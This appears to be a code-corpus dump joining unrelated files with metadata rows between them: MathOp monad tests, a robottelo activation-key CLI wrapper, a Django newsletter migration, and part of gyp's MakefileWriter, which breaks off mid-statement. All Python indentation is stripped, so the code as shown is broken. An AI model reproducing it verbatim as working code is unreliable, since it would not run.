def test_should_chain_computation(self):
self.assertEqual(repr(self.CLASS(5)),
"<MathOp 5>")
self.assertEqual(repr(self.CLASS(5).mul(2)),
"<MathOp 10>")
self.assertEqual(repr(self.CLASS(5).mul(2).add(17)),
"<MathOp 27>")
self.assertEqual(repr(self.CLASS(5).mul(2).add(17).sub(4)),
"<MathOp 23>")
self.assertEqual(repr(self.CLASS(5).mul(2).div(2)),
"<MathOp 5>")
def test_should_chain_nan(self):
self.assertEqual(repr(self.CLASS(5).div(0)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17).sub(4)),
"<MathOp NaN>")
from monads.mathop import step1, step2_1, step2_2, step3, step4
class TestStep1(MathopTest):
CLASS = step1.MathOp
class TestStep2_1(MathopTest):
CLASS = step2_1.MathOp
class TestStep2_2(MathopTest):
CLASS = step2_2.MathOp
class TestStep3(MathopTest):
CLASS = step3.MathOp
class TestStep4(MathopTest):
CLASS = step4.MathOp
| bsd-2-clause | 3,253,654,990,349,496,000 | 27.333333 | 74 | 0.551634 | false | 3.477273 | true | false | false |
apagac/robottelo-blrm | robottelo/cli/activationkey.py | 3 | 3275 | # -*- encoding: utf-8 -*-
"""
Usage::
hammer activation-key [OPTIONS] SUBCOMMAND [ARG] ...
Parameters::
SUBCOMMAND subcommand
[ARG] ... subcommand arguments
Subcommands::
add-host-collection Associate a resource
add-subscription Add subscription
content-override Override product content defaults
copy Copy an activation key
create Create an activation key
delete Destroy an activation key
host-collections List associated host collections
info Show an activation key
list List activation keys
product-content List associated products
remove-host-collection Disassociate a resource
remove-subscription Remove subscription
subscriptions List associated subscriptions
update Update an activation key
"""
from robottelo.cli.base import Base
class ActivationKey(Base):
"""Manipulates Katello's activation-key."""
command_base = 'activation-key'
@classmethod
def add_host_collection(cls, options=None):
"""Associate a resource"""
cls.command_sub = 'add-host-collection'
return cls.execute(cls._construct_command(options))
@classmethod
def add_subscription(cls, options=None):
"""Add subscription"""
cls.command_sub = 'add-subscription'
return cls.execute(cls._construct_command(options))
@classmethod
def content_override(cls, options=None):
"""Override product content defaults"""
cls.command_sub = 'content-override'
return cls.execute(cls._construct_command(options))
@classmethod
def copy(cls, options=None):
"""Copy an activation key"""
cls.command_sub = 'copy'
return cls.execute(cls._construct_command(options))
@classmethod
def host_collection(cls, options=None):
"""List associated host collections"""
cls.command_sub = 'host-collections'
return cls.execute(cls._construct_command(options))
@classmethod
def product_content(cls, options=None):
"""List associated products"""
cls.command_sub = 'product-content'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_host_collection(cls, options=None):
"""Remove the associated resource"""
cls.command_sub = 'remove-host-collection'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_repository(cls, options=None):
"""Disassociate a resource"""
cls.command_sub = 'remove-repository'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_subscription(cls, options=None):
"""Remove subscription"""
cls.command_sub = 'remove-subscription'
return cls.execute(cls._construct_command(options))
@classmethod
def subscriptions(cls, options=None):
"""List associated subscriptions"""
cls.command_sub = 'subscriptions'
return cls.execute(cls._construct_command(options))
| gpl-3.0 | -6,796,707,891,215,969,000 | 33.473684 | 67 | 0.620763 | false | 4.816176 | false | false | false |
CIGIHub/greyjay | greyjay/newsletter/migrations/0018_auto_20151015_2253.py | 1 | 1229 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0015_newsletterexternalarticlelink2'),
]
operations = [
migrations.AlterField(
model_name='newsletterarticlelink',
name='article',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wagtailcore.Page', help_text='Link to an internal article', null=True),
),
migrations.AlterField(
model_name='newslettereventlink',
name='event',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='events.EventPage', help_text='Link to an event', null=True),
),
migrations.AlterField(
model_name='newsletterexternalarticlelink',
name='external_article',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='articles.ExternalArticlePage', help_text='Link to an external article', null=True),
),
]
| mit | -7,314,742,994,192,745,000 | 39.966667 | 199 | 0.651749 | false | 4.056106 | false | false | false |
arangodb/arangodb | 3rdParty/V8/gyp/MakefileWriter.py | 1 | 58894 | import hashlib
import os
import re
import gyp
from gyp import xcode_emulation
from gyp.common import GypError, EnsureDirExists
from gyp.generator.make import generator_default_variables,CalculateVariables
# The .d checking code below uses these functions:
# wildcard, sort, foreach, shell, wordlist
# wildcard can handle spaces, the rest can't.
# Since I could find no way to make foreach work with spaces in filenames
# correctly, the .d files have spaces replaced with another character. The .d
# file for
# Chromium\ Framework.framework/foo
# is for example
# out/Release/.deps/out/Release/Chromium?Framework.framework/foo
# This is the replacement character.
SPACE_REPLACEMENT = '?'
# Header of toplevel Makefile.
# This should go into the build tree, but it's easier to keep it here for now.
_dirname = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_dirname, 'Makefile.tmpl'), 'rt') as f:
file_content = f.read()
SHARED_HEADER = file_content.format(SPACE_REPLACEMENT=SPACE_REPLACEMENT)
SHARED_HEADER_SUFFIX_RULES_COMMENT1 = ("""\
# Suffix rules, putting all outputs into $(obj).
""")
SHARED_HEADER_SUFFIX_RULES_COMMENT2 = ("""\
# Try building from generated source, too.
""")
header = """\
# This file is generated by gyp; do not edit.
"""
# Maps every compilable file extension to the do_cmd that compiles it.
COMPILABLE_EXTENSIONS = {
'.c': 'cc',
'.cc': 'cxx',
'.cpp': 'cxx',
'.cxx': 'cxx',
'.s': 'cc',
'.S': 'cc',
'.m': 'objc',
'.mm': 'objcxx',
}
def WriteRootHeaderSuffixRules(writer):
extensions = sorted(COMPILABLE_EXTENSIONS.keys(), key=str.lower)
writer.write('# Suffix rules, putting all outputs into $(obj).\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n# Try building from generated source, too.\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
def Compilable(filename):
"""Return true if the file is compilable (should be in OBJS)."""
for res in (filename.endswith(e) for e in COMPILABLE_EXTENSIONS):
if res:
return True
return False
# Map from qualified target to path to output.
target_outputs = {}
# Map from qualified target to any linkable output. A subset
# of target_outputs. E.g. when mybinary depends on liba, we want to
# include liba in the linker line; when otherbinary depends on
# mybinary, we just want to build mybinary first.
target_link_deps = {}
def Linkable(filename):
"""Return true if the file is linkable (should be on the link line)."""
return filename.endswith('.o')
def Target(filename):
"""Translate a compilable filename to its .o target."""
return os.path.splitext(filename)[0] + '.o'
def EscapeShellArgument(s):
"""
Quotes an argument so that it will be interpreted literally by a POSIX shell.
Taken from http://stackoverflow.com/questions/35817/whats-the-best-way-to-escape-ossystem-calls-in-python
"""
return "'" + s.replace("'", "'\\''") + "'"
def EscapeMakeVariableExpansion(s):
"""Make has its own variable expansion syntax using $. We must escape it for string to be interpreted literally."""
return s.replace('$', '$$')
def EscapeCppDefine(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = EscapeShellArgument(s)
s = EscapeMakeVariableExpansion(s)
# '#' characters must be escaped even embedded in a string, else Make will
# treat it as the start of a comment.
return s.replace('#', r'\#')
def QuoteIfNecessary(string):
"""TODO: Should this ideally be replaced with one or more of the above functions?"""
if '"' in string:
string = '"' + string.replace('"', '\\"') + '"'
return string
def StringToMakefileVariable(string):
"""Convert a string to a value that is acceptable as a make variable name."""
return re.sub('[^a-zA-Z0-9_]', '_', string)
def Sourceify(path):
"""Convert a path to its source directory form."""
if '$(' in path:
return path
if os.path.isabs(path):
return path
return Sourceify.srcdir_prefix + path
Sourceify.srcdir_prefix = ''
def QuoteSpaces(s, quote=r'\ '):
return s.replace(' ', quote)
# TODO: Avoid code duplication with _ValidateSourcesForMSVSProject in msvs.py.
def _ValidateSourcesForOSX(spec, all_sources):
"""
Makes sure if duplicate basenames are not specified in the source list.
Arguments:
spec: The target dictionary containing the properties of the target.
"""
if spec.get('type', None) != 'static_library':
return
basenames = {}
for source in all_sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in ['.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S']
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ''
for basename, files in basenames.items():
if len(files) > 1:
error += ' %s: %s\n' % (basename, ' '.join(files))
if error:
print('static library %s%s libtool on OS X will generate warnings for them. has several files with the same basename:\n' % (spec['target_name'], error))
raise GypError('Duplicate basenames in sources section, see list above')
# noinspection PyAttributeOutsideInit
class MakefileWriter(object):
"""MakefileWriter packages up the writing of one target-specific foobar.mk.
Its only real entry point is Write(), and is mostly used for namespacing.
"""
def __init__(self, generator_flags, flavor):
self.generator_flags = generator_flags
self.flavor = flavor
self.suffix_rules_srcdir = {}
self.suffix_rules_objdir1 = {}
self.suffix_rules_objdir2 = {}
# Generate suffix rules for all compilable extensions.
for ext in COMPILABLE_EXTENSIONS.keys():
# Suffix rules for source folder.
self.suffix_rules_srcdir.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
# Suffix rules for generated source files.
self.suffix_rules_objdir1.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
self.suffix_rules_objdir2.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
def Write(self, qualified_target, base_path, output_filename, spec, configs, part_of_all):
"""
The main entry point: writes a .mk file for a single target.
Arguments:
qualified_target: target we're generating
base_path: path relative to source root we're building in, used to resolve target-relative paths
output_filename: output .mk file name to write
spec: gyp info
configs: gyp info
part_of_all: flag indicating this target is part of 'all'
"""
EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
self.qualified_target = qualified_target
self.path = base_path
self.target = spec['target_name']
self.type = spec['type']
self.toolset = spec['toolset']
self.is_mac_bundle = xcode_emulation.IsMacBundle(self.flavor, spec)
if self.flavor == 'mac':
self.xcode_settings = xcode_emulation.XcodeSettings(spec)
else:
self.xcode_settings = None
deps, link_deps = self.ComputeDeps(spec)
# Some of the generation below can add extra output, sources, or
# link dependencies. All of the out params of the functions that
# follow use names like extra_foo.
extra_outputs = []
extra_sources = []
extra_link_deps = []
extra_mac_bundle_resources = []
mac_bundle_deps = []
if self.is_mac_bundle:
self.output = self.ComputeMacBundleOutput()
self.output_binary = self.ComputeMacBundleBinaryOutput()
else:
self.output = self.output_binary = self.ComputeOutput(spec)
self.is_standalone_static_library = bool(
spec.get('standalone_static_library', 0))
self._INSTALLABLE_TARGETS = ('executable', 'loadable_module', 'shared_library')
if (self.is_standalone_static_library or
self.type in self._INSTALLABLE_TARGETS):
self.alias = os.path.basename(self.output)
install_path = self._InstallableTargetInstallPath()
else:
self.alias = self.output
install_path = self.output
self.WriteLn("TOOLSET := " + self.toolset)
self.WriteLn("TARGET := " + self.target)
# Actions must come first, since they can generate more OBJs for use below.
if 'actions' in spec:
self.WriteActions(spec['actions'], extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all)
# Rules must be early like actions.
if 'rules' in spec:
self.WriteRules(spec['rules'], extra_sources, extra_outputs, extra_mac_bundle_resources)
if 'copies' in spec:
self.WriteCopies(spec['copies'], extra_outputs, part_of_all)
# Bundle resources.
if self.is_mac_bundle:
all_mac_bundle_resources = spec.get('mac_bundle_resources', []) + extra_mac_bundle_resources
self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps)
self.WriteMacInfoPlist(mac_bundle_deps)
self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps)
# Sources.
all_sources = spec.get('sources', []) + extra_sources
if all_sources:
if self.flavor == 'mac':
# libtool on OS X generates warnings for duplicate basenames in the same
# target.
_ValidateSourcesForOSX(spec, all_sources)
self.WriteSources(
configs, deps, all_sources, extra_outputs, extra_link_deps,
gyp.xcode_emulation.MacPrefixHeader(self.xcode_settings, lambda p: Sourceify(self.Absolutify(p)), self.Pchify)
)
sources = [x for x in all_sources if Compilable(x)]
if sources:
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT1)
extensions = set([os.path.splitext(s)[1] for s in sources])
for ext in extensions:
if ext in self.suffix_rules_srcdir:
self.WriteLn(self.suffix_rules_srcdir[ext])
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT2)
for ext in extensions:
if ext in self.suffix_rules_objdir1:
self.WriteLn(self.suffix_rules_objdir1[ext])
for ext in extensions:
if ext in self.suffix_rules_objdir2:
self.WriteLn(self.suffix_rules_objdir2[ext])
self.WriteLn('# End of this set of suffix rules')
# Add dependency from bundle to bundle binary.
if self.is_mac_bundle:
mac_bundle_deps.append(self.output_binary)
self.WriteTarget(spec, configs, deps, extra_link_deps + link_deps,
mac_bundle_deps, extra_outputs, part_of_all)
# Update global list of target outputs, used in dependency tracking.
target_outputs[qualified_target] = install_path
# Update global list of link dependencies.
if self.type in ('static_library', 'shared_library'):
target_link_deps[qualified_target] = self.output_binary
# Currently any versions have the same effect, but in future the behavior
# could be different.
if self.generator_flags.get('android_ndk_version', None):
self.WriteAndroidNdkModuleRule(self.target, all_sources, link_deps)
self.fp.close()
def WriteSubMake(self, output_filename, makefile_path, targets, build_dir):
"""Write a "sub-project" Makefile.
This is a small, wrapper Makefile that calls the top-level Makefile to build
the targets from a single gyp file (i.e. a sub-project).
Arguments:
output_filename: sub-project Makefile name to write
makefile_path: path to the top-level Makefile
targets: list of "all" targets for this sub-project
build_dir: build output directory, relative to the sub-project
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
# For consistency with other builders, put sub-project build output in the
# sub-project dir (see test/subdirectory/gyptest-subdir-all.py).
self.WriteLn('export builddir_name ?= %s' %
os.path.join(os.path.dirname(output_filename), build_dir))
self.WriteLn('.PHONY: all')
self.WriteLn('all:')
if makefile_path:
makefile_path = ' -C ' + makefile_path
self.WriteLn('\t$(MAKE)%s %s' % (makefile_path, ' '.join(targets)))
self.fp.close()
def WriteActions(self, actions, extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all):
"""Write Makefile code for any 'actions' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
actions (used to make other pieces dependent on these
actions)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for action in actions:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
action['action_name']))
self.WriteLn('### Rules for action "%s":' % action['action_name'])
inputs = action['inputs']
outputs = action['outputs']
# Build up a list of outputs.
# Collect the output dirs we'll need.
dirs = set()
for out in outputs:
d = os.path.split(out)[0]
if d:
dirs.add(d)
if int(action.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(action.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
# Write the actual command.
action_commands = action['action']
if self.flavor == 'mac':
action_commands = [gyp.xcode_emulation.ExpandEnvVars(command, env) for command in action_commands]
command = gyp.common.EncodePOSIXShellList(action_commands)
if 'message' in action:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, action['message']))
else:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, name))
if len(dirs) > 0:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# command and cd_action get written to a toplevel variable called
# cmd_foo. Toplevel variables can't handle things that change per
# makefile like $(TARGET), so hardcode the target.
command = command.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the action runs an executable from this
# build which links to shared libs from this build.
# actions run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn('cmd_%s = LD_LIBRARY_PATH=$(builddir)/lib.host:'
'$(builddir)/lib.target:$$LD_LIBRARY_PATH; '
'export LD_LIBRARY_PATH; '
'%s%s'
% (name, cd_action, command))
self.WriteLn()
outputs = [self.Absolutify(o) for o in outputs]
# The makefile rules are all relative to the top dir, but the gyp actions
# are defined relative to their containing dir. This replaces the obj
# variable for the action rule with an absolute version so that the output
# goes in the right place.
# Only write the 'obj' and 'builddir' rules for the "primary" output (:1);
# it's superfluous for the "extra outputs", and this avoids accidentally
# writing duplicate dummy rules for those outputs.
# Same for environment.
self.WriteLn("%s: obj := $(abs_obj)" % QuoteSpaces(outputs[0]))
self.WriteLn("%s: builddir := $(abs_builddir)" % QuoteSpaces(outputs[0]))
self.WriteSortedXcodeEnv(outputs[0], self.GetSortedXcodeEnv())
for i in inputs:
assert ' ' not in i, ("Spaces in action input filenames not supported (%s)" % i)
for output in outputs:
assert ' ' not in output, ("Spaces in action output filenames not supported (%s)" % output)
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
self.WriteDoCmd(outputs, map(Sourceify, map(self.Absolutify, inputs)), part_of_all=part_of_all, command=name)
# Stuff the outputs in a variable so we can refer to them later.
outputs_variable = 'action_%s_outputs' % name
self.WriteLn('%s := %s' % (outputs_variable, ' '.join(outputs)))
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn()
self.WriteLn()
def WriteRules(self, rules, extra_sources, extra_outputs, extra_mac_bundle_resources):
"""Write Makefile code for any 'rules' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
rules (used to make other pieces dependent on these rules)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for rule in rules:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
rule['rule_name']))
count = 0
self.WriteLn('### Generated for rule %s:' % name)
all_outputs = []
for rule_source in rule.get('rule_sources', []):
dirs = set()
(rule_source_dirname, rule_source_basename) = os.path.split(rule_source)
(rule_source_root, rule_source_ext) = os.path.splitext(rule_source_basename)
outputs = [self.ExpandInputRoot(out, rule_source_root,
rule_source_dirname)
for out in rule['outputs']]
for out in outputs:
d = os.path.dirname(out)
if d:
dirs.add(d)
if int(rule.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(rule.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
inputs = map(Sourceify, map(self.Absolutify, [rule_source] +
rule.get('inputs', [])))
actions = ['$(call do_cmd,%s_%d)' % (name, count)]
if name == 'resources_grit':
# HACK: This is ugly. Grit intentionally doesn't touch the
# timestamp of its output file when the file doesn't change,
# which is fine in hash-based dependency systems like scons
# and forge, but not kosher in the make world. After some
# discussion, hacking around it here seems like the least
# amount of pain.
actions += ['@touch --no-create $@']
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
outputs = [self.Absolutify(o) for o in outputs]
all_outputs += outputs
# Only write the 'obj' and 'builddir' rules for the "primary" output
# (:1); it's superfluous for the "extra outputs", and this avoids
# accidentally writing duplicate dummy rules for those outputs.
self.WriteLn('%s: obj := $(abs_obj)' % outputs[0])
self.WriteLn('%s: builddir := $(abs_builddir)' % outputs[0])
self.WriteMakeRule(outputs, inputs, actions,
command="%s_%d" % (name, count))
# Spaces in rule filenames are not supported, but rule variables have
# spaces in them (e.g. RULE_INPUT_PATH expands to '$(abspath $<)').
# The spaces within the variables are valid, so remove the variables
# before checking.
variables_with_spaces = re.compile(r'\$\([^ ]* \$<\)')
for output in outputs:
output = re.sub(variables_with_spaces, '', output)
assert ' ' not in output, (
"Spaces in rule filenames not yet supported (%s)" % output)
self.WriteLn('all_deps += %s' % ' '.join(outputs))
action = [self.ExpandInputRoot(ac, rule_source_root,
rule_source_dirname)
for ac in rule['action']]
mkdirs = ''
if len(dirs) > 0:
mkdirs = 'mkdir -p %s; ' % ' '.join(dirs)
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# action, cd_action, and mkdirs get written to a toplevel variable
# called cmd_foo. Toplevel variables can't handle things that change
# per makefile like $(TARGET), so hardcode the target.
if self.flavor == 'mac':
action = [gyp.xcode_emulation.ExpandEnvVars(command, env)
for command in action]
action = gyp.common.EncodePOSIXShellList(action)
action = action.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
mkdirs = mkdirs.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the rule runs an executable from this
# build which links to shared libs from this build.
# rules run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn(
"cmd_%(name)s_%(count)d = LD_LIBRARY_PATH="
"$(builddir)/lib.host:$(builddir)/lib.target:$$LD_LIBRARY_PATH; "
"export LD_LIBRARY_PATH; "
"%(cd_action)s%(mkdirs)s%(action)s" % {
'action': action,
'cd_action': cd_action,
'count': count,
'mkdirs': mkdirs,
'name': name,
})
self.WriteLn(
'quiet_cmd_%(name)s_%(count)d = RULE %(name)s_%(count)d $@' % {
'count': count,
'name': name,
})
self.WriteLn()
count += 1
outputs_variable = 'rule_%s_outputs' % name
self.WriteList(all_outputs, outputs_variable)
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn('### Finished generating for rule: %s' % name)
self.WriteLn()
self.WriteLn('### Finished generating for all rules')
self.WriteLn('')
def WriteCopies(self, copies, extra_outputs, part_of_all):
"""Write Makefile code for any 'copies' from the gyp input.
extra_outputs: a list that will be filled in with any outputs of this action
(used to make other pieces dependent on this action)
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Generated for copy rule.')
variable = StringToMakefileVariable(self.qualified_target + '_copies')
outputs = []
for copy in copies:
for path in copy['files']:
# Absolutify() may call normpath, and will strip trailing slashes.
path = Sourceify(self.Absolutify(path))
filename = os.path.split(path)[1]
output = Sourceify(self.Absolutify(os.path.join(copy['destination'],
filename)))
# If the output path has variables in it, which happens in practice for
# 'copies', writing the environment as target-local doesn't work,
# because the variables are already needed for the target name.
# Copying the environment variables into global make variables doesn't
# work either, because then the .d files will potentially contain spaces
# after variable expansion, and .d file handling cannot handle spaces.
# As a workaround, manually expand variables at gyp time. Since 'copies'
# can't run scripts, there's no need to write the env then.
# WriteDoCmd() will escape spaces for .d files.
env = self.GetSortedXcodeEnv()
output = gyp.xcode_emulation.ExpandEnvVars(output, env)
path = gyp.xcode_emulation.ExpandEnvVars(path, env)
self.WriteDoCmd([output], [path], 'copy', part_of_all)
outputs.append(output)
self.WriteLn('%s = %s' % (variable, ' '.join(map(QuoteSpaces, outputs))))
extra_outputs.append('$(%s)' % variable)
self.WriteLn()
def WriteMacBundleResources(self, resources, bundle_deps):
"""Writes Makefile code for 'mac_bundle_resources'."""
self.WriteLn('### Generated for mac_bundle_resources')
product_dir = generator_default_variables['PRODUCT_DIR']
sources = map(Sourceify, map(self.Absolutify, resources))
bundle_resources = gyp.xcode_emulation.GetMacBundleResources(product_dir, self.xcode_settings, sources)
for output, res in bundle_resources:
_, ext = os.path.splitext(output)
# TODO(refack): actualy figure this out for `copy-bundle-resource`
# is_binary = xcode_emulation.IsBinaryOutputFormat(output)
if ext != '.xcassets':
# Make does not supports '.xcassets' emulation.
self.WriteDoCmd([output], [res], 'mac_tool,,,copy-bundle-resource', part_of_all=True)
bundle_deps.append(output)
def WriteMacInfoPlist(self, bundle_deps):
"""Write Makefile code for bundle Info.plist files."""
info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist(
generator_default_variables['PRODUCT_DIR'], self.xcode_settings,
lambda p: Sourceify(self.Absolutify(p)))
if not info_plist:
return
if defines:
# Create an intermediate file to store preprocessed results.
intermediate_plist = ('$(obj).$(TOOLSET)/$(TARGET)/' + os.path.basename(info_plist))
self.WriteList(defines, intermediate_plist + ': INFOPLIST_DEFINES', '-D', quoter=EscapeCppDefine)
self.WriteMakeRule([intermediate_plist], [info_plist],
['$(call do_cmd,infoplist)',
# "Convert" the plist so that any weird whitespace changes from the
# preprocessor do not affect the XML parser in mac_tool.
'@plutil -convert xml1 $@ $@'])
info_plist = intermediate_plist
# plists can contain envvars and substitute them into the file.
self.WriteSortedXcodeEnv(out, self.GetSortedXcodeEnv(additional_settings=extra_env))
self.WriteDoCmd([out], [info_plist], 'mac_tool,,,copy-info-plist', part_of_all=True)
bundle_deps.append(out)
def WriteSources(self, configs, deps, sources, extra_outputs, extra_link_deps, precompiled_header):
"""Write Makefile code for any 'sources' from the gyp input.
These are source files necessary to build the current target.
configs, deps, sources: input from gyp.
extra_outputs: a list of extra outputs this action should be dependent on;
used to serialize action/rules before compilation
extra_link_deps: a list that will be filled in with any outputs of
compilation (to be used in link lines)
part_of_all: flag indicating this target is part of 'all'
"""
# Write configuration-specific variables for CFLAGS, etc.
for configname in sorted(configs.keys()):
config = configs[configname]
self.WriteList(config.get('defines'), 'DEFS_%s' % configname, prefix='-D', quoter=EscapeCppDefine)
if self.flavor == 'mac':
cflags = self.xcode_settings.GetCflags(configname)
cflags_c = self.xcode_settings.GetCflagsC(configname)
cflags_cc = self.xcode_settings.GetCflagsCC(configname)
cflags_objc = self.xcode_settings.GetCflagsObjC(configname)
cflags_objcc = self.xcode_settings.GetCflagsObjCC(configname)
else:
cflags = config.get('cflags')
cflags_c = config.get('cflags_c')
cflags_cc = config.get('cflags_cc')
cflags_objc = None
cflags_objcc = None
self.WriteLn("# Flags passed to all source files.")
self.WriteList(cflags, 'CFLAGS_%s' % configname)
self.WriteLn("# Flags passed to only C files.")
self.WriteList(cflags_c, 'CFLAGS_C_%s' % configname)
self.WriteLn("# Flags passed to only C++ files.")
self.WriteList(cflags_cc, 'CFLAGS_CC_%s' % configname)
if self.flavor == 'mac':
self.WriteLn("# Flags passed to only ObjC files.")
self.WriteList(cflags_objc, 'CFLAGS_OBJC_%s' % configname)
self.WriteLn("# Flags passed to only ObjC++ files.")
self.WriteList(cflags_objcc, 'CFLAGS_OBJCC_%s' % configname)
includes = config.get('include_dirs')
if includes:
includes = [Sourceify(self.Absolutify(include)) for include in includes]
self.WriteList(includes, 'INCS_%s' % configname, prefix='-I')
compilable = filter(Compilable, sources)
objs = [self.Objectify(self.Absolutify(Target(x))) for x in compilable]
self.WriteList(objs, 'OBJS')
for obj in objs:
assert ' ' not in obj, (
"Spaces in object filenames not supported (%s)" % obj)
self.WriteLn('# Add to the list of files we specially track '
'dependencies for.')
self.WriteLn('all_deps += $(OBJS)')
self.WriteLn()
# Make sure our dependencies are built first.
if deps:
self.WriteMakeRule(['$(OBJS)'], deps,
comment='Make sure our dependencies are built before any of us.',
order_only=True)
# Make sure the actions and rules run first.
# If they generate any extra headers etc., the per-.o file dep tracking
# will catch the proper rebuilds, so order only is still ok here.
if extra_outputs:
self.WriteMakeRule(['$(OBJS)'], extra_outputs,
comment='Make sure our actions/rules run before any of us.',
order_only=True)
pchdeps = precompiled_header.GetObjDependencies(compilable, objs)
if pchdeps:
self.WriteLn('# Dependencies from obj files to their precompiled headers')
for source, obj, gch in pchdeps:
self.WriteLn('%s: %s' % (obj, gch))
self.WriteLn('# End precompiled header dependencies')
if objs:
extra_link_deps.append('$(OBJS)')
self.WriteLn("""\
# CFLAGS et al overrides must be target-local.
# See "Target-specific Variable Values" in the GNU Make manual.""")
self.WriteLn("$(OBJS): TOOLSET := $(TOOLSET)")
self.WriteLn("$(OBJS): GYP_CFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('c') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_CXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('cc') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE))")
if self.flavor == 'mac':
self.WriteLn("$(OBJS): GYP_OBJCFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('m') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE)) "
"$(CFLAGS_OBJC_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_OBJCXXFLAGS := "
